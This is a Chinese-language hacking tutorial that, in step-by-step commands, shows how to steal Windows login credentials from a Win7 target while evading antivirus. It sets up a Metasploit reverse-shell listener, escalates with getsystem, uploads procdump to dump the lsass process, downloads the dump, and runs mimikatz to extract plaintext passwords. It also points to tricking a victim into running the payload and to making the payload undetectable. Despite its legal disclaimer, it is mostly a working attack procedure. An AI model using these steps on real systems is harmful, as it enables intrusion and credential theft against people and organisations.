法国大神写的密码逆向神器—mimikatz，配合procdump远程绕过杀软

2020-3-4 16:03 |来自: 互联网 2167 0

摘要: 本课解决了不往win7靶机上传容易被杀毒软件截获的mimikatz，而是上传正常的procdump下载win7靶机的lsass进程，并保存成lsass.dmp文件，利用meterpreter会话下载到本地，在windows主机中使用本地的mimikatz进行破解，非常和谐！

关键词： 靶机输入 meterpreter lsass 目录运行文件 Procdump mimikatz 盘根

本文仅用于讨论网络安全技术，以保护信息安全为目的，请勿用于非法用途！

课前回顾——mimikatz

上一节课，我们通过meterpreter会话向目标靶机上传了mimikatz，容易被对方靶机的杀软发现。此神器可以在目标靶机中存活并通过cmd命令启动，几行简短的命令就可以直接获取目标靶机的登录口令明文密码！

Procdump是什么？

本课我们着重讲解如何不上传mimikatz，而是上传一个不会被杀毒软件截获的可执行文件——procdump，它可以直接将windows运行中的lsass.exe进程进行保存成一个dmp后缀的文件。

lsass进程一直存活在windows中，它是管理运行windows用户口令的一个进程，如下图。

运行我们上传到目标主机的Procdump，就可以对进程lsass.exe进行操作，实现截获哈希值。

利用meterpreter会话上传procdump、下载哈希

通过在靶机运行我们上节课制作的可执行载荷文件test.exe，实际测试中，你需要对方双击运行即可在kali获取Meterpreter会话。

不可否认的是，你还要面临对你的test.exe进行免杀，你怎么发送这个test给目标，对方会不会双击运行，这都是需要考量的！另外我们到此制作的可执行载荷test.exe都是内网中进行测试的（同一个wifi下），如果test.exe放到离你一千公里之外的目标靶机上，怎么实现靶机运行你的test.exe后也能回连到你的kali呢？这要考量公网、端口转发等技术，所有这些问题对我们今天的学习不会产生影响，但是长远角度来说，你需要按这个方向去琢磨，当然，关注小白嘿客，私信也可以学习！

警告：仅用于学习测试，违法自负责任！

kali终端下输入：msfconsole，配置好对win7靶机上的test.exe的侦听！

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.206
set lport 8888
run

既然已经设置了监听，我们直接去win7靶机模拟运行test.exe，然后就会看到kali的metasploit建立会话！

注意：我们获得的meterpreter会话，输入"？"号后就会显示所有可以运行的命令进行控制win7靶机，比如我们今天需要截获靶机的用户口令hash值，本来直接输入"hashdump"就可以了，如下图。

先记得查看权限，不是系统权限记得输入：getsystem提权！

发现hashdump并不能正确运行，很简单，对方系统不允许访问！

必杀技——上传procdump

关注、私信小白嘿客，加入课程即可领取！首先将procdump下载到kali的/root主目录下。

请根据靶机不同的系统位数进行下载；

在meterpreter会话中输入：

pwd：查看当前在靶机中的目录位置
upload procdump.exe：上传工具到win7靶机
ls：查看当前靶机目录的文件是否有上传的工具

在meterpreter中进入win7靶机的cmd。输入：shell

如果出现乱码，输入chcp 65001即可；

然后进入procdump存放的绝对路径下，在meterpreter中输入：

cd C:UsersAdministratorDesktop

为什么要输入这样的路径呢？

从这里就可以看到我们metasploit侦听到对方的目录是这个C:UsersAdministratorDesktop！如下图说明是靶机的桌面desktop！或者说靶机中的test.exe在哪个目录下运行，我们就进入哪个目录，实际就在靶机的桌面中！

在meterpreter中得到的cmd中继续输入：procdump.exe -accepteula -ma lsass.exe lsass.dmp；

lsass.exe代表靶机中的进程lsass，后面的lsass.dmp是我们定义的文件名，随意，但后缀一定是dmp格式！

此时你会在kali终端下看到这样的输出，表示成功将对方进程lsass.exe中的hash值已经保存到lsass.dmp中了。

按下"ctrl+c，输入Y"退回meterpreter会话。然后在meterpreter中进入靶机的目录C:UsersAdministratorDesktop中。通过pwd查看，如果已经在这个目录下，就不用进入了。

将靶机中上一步生成的lsass.dmp文件下载到我们kali本地主目录下；

在meterpreter中输入：download lsass.dmp

很幸运，成功进行了下载到本地，可以前往kali的主目录下查看lsass.dmp!

破解lsass.dmp，获取明文口令

破解dmp类型的文件，只能使用mimikatz。将mimikatz所有文件复制到c盘根目录下，如图！

我们使用32位的mimkatz。因为32位的可以在64位运行，但是64位的不能在32位运行！

粘贴到下面c盘根目录下：

打开win7主机的cmd，切换到c盘根目录下。

cd c:
dir :查询文件或目录，发现有mimikatz的几个工具文件。

将kali从win7靶机下载下来的lsass.dmp文件从kali目录中拖出来，拖到win7主机的c盘中即可。

继续在你的win7主机cmd中输入：mimikatz，就可开启mimikatz界面！

输入privilege::debug进行提权！

输入sekurlsa::minidump c:lsass.dmp 选择dmp文件

输入sekurlsa::logonPasswords，使用logonPasswords模块破解lsass.dmp文件，获取密码！

看看，hash、win7靶机的用户名Administrator和密码全被破解了出来！而且如果存在其他用户和口令，也能全部进行展示！

本课解决了不往win7靶机上传容易被杀毒软件截获的mimikatz，而是上传正常的procdump下载win7靶机的lsass进程，并保存成lsass.dmp文件，利用meterpreter会话下载到本地，在windows主机中使用本地的mimikatz进行破解，非常和谐！